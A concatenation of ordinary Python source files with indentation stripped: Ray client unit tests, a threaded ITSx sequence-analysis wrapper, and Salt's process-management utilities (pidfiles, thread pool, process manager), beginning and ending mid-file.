if __name__ == "__main__":
filelist = [join(indir_path, f) for f in listdir(indir_path) if isfile(join(indir_path, f))]
split = []
step = ceil(len(filelist) / nthreads)
for i in range(nthreads):
split.append(filelist[i * step : min(len(filelist), (i + 1) * step)])
for i, fl in enumerate(split):
p = Process(target=process, args=(fl,i))
p.start()
|
test_client.py
|
import os
import pytest
import time
import sys
import logging
import queue
import threading
import _thread
from unittest.mock import patch
import numpy as np
import ray.util.client.server.server as ray_client_server
from ray.tests.client_test_utils import create_remote_signal_actor
from ray.tests.client_test_utils import run_wrapped_actor_creation
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import connect_to_client_or_not
from ray.util.client.ray_client_helpers import ray_start_client_server
from ray._private.client_mode_hook import client_mode_should_convert
from ray._private.client_mode_hook import disable_client_hook
from ray._private.client_mode_hook import enable_client_mode
from ray._private.test_utils import run_string_as_driver
@pytest.mark.parametrize("connect_to_client", [False, True])
def test_client_context_manager(ray_start_regular_shared, connect_to_client):
import ray
with connect_to_client_or_not(connect_to_client):
if connect_to_client:
# Client mode is on.
assert client_mode_should_convert(auto_init=True)
# We're connected to Ray client.
assert ray.util.client.ray.is_connected()
else:
assert not client_mode_should_convert(auto_init=True)
assert not ray.util.client.ray.is_connected()
def test_client_thread_safe(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
return "ok"
class Blocker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
def run(self):
ray.get(block.remote())
b = Blocker()
b.start()
time.sleep(1)
# Can concurrently execute the get.
assert ray.get(fast.remote(), timeout=5) == "ok"
# @pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# @pytest.mark.skip()
def test_client_mode_hook_thread_safe(ray_start_regular_shared):
with ray_start_client_server():
with enable_client_mode():
assert client_mode_should_convert(auto_init=True)
lock = threading.Lock()
lock.acquire()
q = queue.Queue()
def disable():
with disable_client_hook():
q.put(client_mode_should_convert(auto_init=True))
lock.acquire()
q.put(client_mode_should_convert(auto_init=True))
t = threading.Thread(target=disable)
t.start()
assert client_mode_should_convert(auto_init=True)
lock.release()
t.join()
assert q.get() is False, "Threaded disable_client_hook failed to disable"
assert q.get() is True, "Threaded disable_client_hook failed to re-enable"
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
def test_get_list(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def f():
return "OK"
assert ray.get([]) == []
assert ray.get([f.remote()]) == ["OK"]
get_count = 0
get_stub = ray.worker.server.GetObject
# ray.get() uses unary-unary RPC. Mock the server handler to count
# the number of requests received.
def get(req, metadata=None):
nonlocal get_count
get_count += 1
return get_stub(req, metadata=metadata)
ray.worker.server.GetObject = get
refs = [f.remote() for _ in range(100)]
assert ray.get(refs) == ["OK" for _ in range(100)]
# Only 1 RPC should be sent.
assert get_count == 1
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
# Make sure ray.put(1) == 1 is False and does not raise an exception.
objectref = ray.put(1)
assert not objectref == 1
# Make sure it returns True when necessary as well.
assert objectref == ClientObjectRef(objectref.id)
# Assert output is correct type.
list_put = ray.put([1, 2, 3])
assert isinstance(list_put, ClientObjectRef)
assert ray.get(list_put) == [1, 2, 3]
def test_put_failure_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
class DeSerializationFailure:
def __getstate__(self):
return ""
def __setstate__(self, i):
raise ZeroDivisionError
dsf = DeSerializationFailure()
with pytest.raises(ZeroDivisionError):
ray.put(dsf)
# Ensure Ray Client is still connected
assert ray.get(ray.put(100)) == 100
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or (
ready,
remaining,
) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) or (
ready_retval,
remaining_retval,
) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
SignalActor = create_remote_signal_actor(ray)
signaler = SignalActor.remote()
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
# Timeout 0 on ray.wait leads to immediate return
# (not indefinite wait for first return as with timeout None):
unready_ref = signaler.wait.remote()
res = ray.wait([unready_ref], timeout=0)
# Not ready.
assert res[0] == [] and len(res[1]) == 1
ray.get(signaler.send.remote())
ready_ref = signaler.wait.remote()
# Ready.
res = ray.wait([ready_ref], timeout=10)
assert len(res[0]) == 1 and res[1] == []
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return "Hello " + whom, self.count
@ray.method(num_returns=2)
def say_hi(self, whom):
self.count += 1
return "Hi " + whom, self.count
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
ref = actor.say_hello.remote("world")
s, count = ray.get(ref)
assert s == "Hello world"
assert count == 2
r1, r2 = actor.say_hi.remote("ray")
assert ray.get(r1) == "Hi ray"
assert ray.get(r2) == 3
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact, 10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(
actor_handle.exec_exec.remote(second_actor, fact, 9)
) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj, 4)) == local_fact(4)
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propogate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2, logs_with_id
assert any((msg.find("get") >= 0 for msg in logs_with_id)), logs_with_id
assert any((msg.find("put") >= 0 for msg in logs_with_id)), logs_with_id
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
num_hello = 0
for msg in log_msgs:
if "Hello world" in msg:
num_hello += 1
assert num_hello == 2, f"Invalid logs: {log_msgs}"
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(ValueError, match="Failed to look up actor with name 'abc'"):
ray.get_actor("abc")
def test_invalid_task(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(TypeError):
@ray.remote(runtime_env="invalid value")
def f():
return 1
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor."""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
@ray.method(num_returns=2)
def half(self):
return self.x / 2, self.x / 2
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
h1, h2 = ray.get(detatched_actor.half.remote())
assert h1 == 3
assert h2 == 3
def test_error_serialization(ray_start_regular_shared):
"""Test that errors will be serialized properly."""
fake_path = os.path.join(os.path.dirname(__file__), "not_a_real_file")
with pytest.raises(FileNotFoundError):
with ray_start_client_server() as ray:
@ray.remote
def g():
with open(fake_path, "r") as f:
f.read()
# Raises a FileNotFoundError
ray.get(g.remote())
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server,))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
@patch.dict(os.environ, {"RAY_ENABLE_AUTO_CONNECT": "0"})
def test_client_gpu_ids(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with enable_client_mode():
# No client connection.
with pytest.raises(Exception) as e:
ray.get_gpu_ids()
assert (
str(e.value) == "Ray Client is not connected."
" Please connect by calling `ray.init`."
)
with ray_start_client_server():
# Now have a client connection.
assert ray.get_gpu_ids() == []
def test_client_serialize_addon(call_ray_stop_only):
import ray
import pydantic
ray.init(num_cpus=0)
class User(pydantic.BaseModel):
name: str
with ray_start_client_server() as ray:
assert ray.get(ray.put(User(name="ray"))).name == "ray"
object_ref_cleanup_script = """
import ray
ray.init("ray://localhost:50051")
@ray.remote
def f():
return 42
@ray.remote
class SomeClass:
pass
obj_ref = f.remote()
actor_ref = SomeClass.remote()
"""
def test_object_ref_cleanup():
# Checks no error output when running the script in
# object_ref_cleanup_script
# See https://github.com/ray-project/ray/issues/17968 for details
with ray_start_client_server():
result = run_string_as_driver(object_ref_cleanup_script)
assert "Error in sys.excepthook:" not in result
assert "AttributeError: 'NoneType' object has no " not in result
assert "Exception ignored in" not in result
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25552 --port 0"],
indirect=True,
)
def test_wrapped_actor_creation(call_ray_start):
"""
When the client schedules an actor, the server will load a separate
copy of the actor class if it's defined in a separate file. This
means that modifications to the client's copy of the actor class
aren't propagated to the server. Currently, tracing logic modifies
the signatures of actor methods to pass around metadata when ray.remote
is applied to an actor class. However, if a user does something like:
class SomeActor:
def __init__(self):
pass
def decorate_actor():
RemoteActor = ray.remote(SomeActor)
...
Then the SomeActor class will have its signatures modified on the client
side, but not on the server side, since ray.remote was applied inside of
the function instead of directly on the actor. Note if it were directly
applied to the actor then the signature would be modified when the server
imports the class.
"""
import ray
ray.init("ray://localhost:25552")
run_wrapped_actor_creation()
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 0"],
indirect=True,
)
@pytest.mark.parametrize("use_client", [True, False])
def test_init_requires_no_resources(call_ray_start, use_client):
import ray
if use_client:
address = call_ray_start
ray.init(address)
else:
ray.init("ray://localhost:25553")
@ray.remote(num_cpus=0)
def f():
pass
ray.get(f.remote())
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 1"],
indirect=True,
)
def test_object_ref_release(call_ray_start):
import ray
ray.init("ray://localhost:25553")
a = ray.put("Hello")
ray.shutdown()
ray.init("ray://localhost:25553")
del a
with disable_client_hook():
ref_cnt = ray.util.client.ray.get_context().client_worker.reference_count
assert all(v > 0 for v in ref_cnt.values())
def test_empty_objects(ray_start_regular_shared):
"""
Tests that client works with "empty" objects. Sanity check, since put requests
will fail if the serialized version of an object consists of zero bytes.
"""
objects = [0, b"", "", [], np.array(()), {}, set(), None]
with ray_start_client_server() as ray:
for obj in objects:
ref = ray.put(obj)
if isinstance(obj, np.ndarray):
assert np.array_equal(ray.get(ref), obj)
else:
assert ray.get(ref) == obj
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
its.py
|
#!/usr/bin/env python
from threading import Thread
from accessoryFunctions import *
from itsx.parallel import ITSx
import os
__author__ = 'mike knowles'
class ITS(object):
def __init__(self, inputobject):
from Queue import Queue
self.metadata = [sample for sample in inputobject.runmetadata.samples
if os.path.isfile(sample.general.bestassemblyfile)]
self.start = inputobject.starttime
self.threads = int(inputobject.cpus)
self.path = inputobject.path
self.smallqueue = Queue()
self.hmm = inputobject.hmm
with open(which("ITSx")) as f:
for line in f:
if line.startswith("$app_version"):
self.version = line.split('=')[1].strip()[1:-2]
break
printtime('Performing ITSx {} analysis'.format(self.version), self.start)
for _ in range(len(self.metadata)):
# Send the threads to the merge method. :args is empty as I'm using
threads = Thread(target=self.run, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for i in self.metadata:
i.general.ITSxresults = '{}/ITSx_results'.format(i.general.outputdirectory)
make_path(i.general.ITSxresults)
self.smallqueue.put(i)
self.smallqueue.join()
@staticmethod
def parse(sample, pos):
sample.ITS = GenObject()
main = lambda k, v: getattr(*k).append(v) if hasattr(*k) else setattr(*k + ([v],))
for line in pos:
line = line.strip()
lst = line.split('\t')
contig = lst[0]
for ele in lst[2:]:
if "No" not in ele and ': ' in ele:
k, v = ele.split(": ")
main((sample.ITS, k), "{}[{}]".format(contig, v.replace('-', ':')))
def run(self):
while True:
sample = self.smallqueue.get()
sample.software.ITSx = self.version
positions, summary = [os.path.join(sample.general.ITSxresults, sample.name + f)
for f in ['.positions.txt', '.summary.txt']]
sample.commands.ITSx = ITSx(o=sample.general.ITSxresults,
i=sample.general.bestassemblyfile,
cpu=self.threads,
N=2, t=self.hmm,
detailed_results="T",
preserve="T")
if not all(map(os.path.isfile, [positions, summary])):
sample.commands.ITSx(name=sample.name, total=int(sample.assembly.TotalLength))
if all(map(os.path.isfile, [positions, summary])):
if os.stat([positions, summary][0]).st_size:
with open([positions, summary][0]) as pos:
self.parse(sample, pos)
else:
printtime("ERROR: No output generated for " + sample.name, self.start)
self.smallqueue.task_done()
if __name__ == '__main__':
from metadataReader import MetadataReader
# from multiprocessing import cpu_count
from time import time
import json
metadata = MetadataObject()
metadata.path = "/data/"
metadata.samples = [GenObject({'name': '2015-SEQ-1283'})]
# metadata.cpus = cpu_count()
metadata.cpus = 4
metadata.hmm = "F,O"
metadata.starttime = time()
metadata.runmetadata.samples = MetadataReader(metadata).samples
ITS(metadata)
# metadata.runmetadata.samples[0].commands.Blast = NcbiblastnCommandline(help=True)
# print json.dumps(dict(metadata.runmetadata.samples[0]), indent=4, sort_keys=True)
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import os
import sys
import time
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in self._process_map:
os.kill(pid, signal)
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows():
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
else:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != 3:
raise
del self._process_map[pid]
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __init__(self, *args, **kwargs):
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
multiprocessing.util.register_after_fork(self, MultiprocessingProcess.__setup_process_logging)
multiprocessing.util.Finalize(self, salt.log.setup.shutdown_multiprocessing_logging, exitpriority=16)
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
multiprocessing.util.register_after_fork(self, SignalHandlingMultiprocessingProcess.__setup_signals)
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
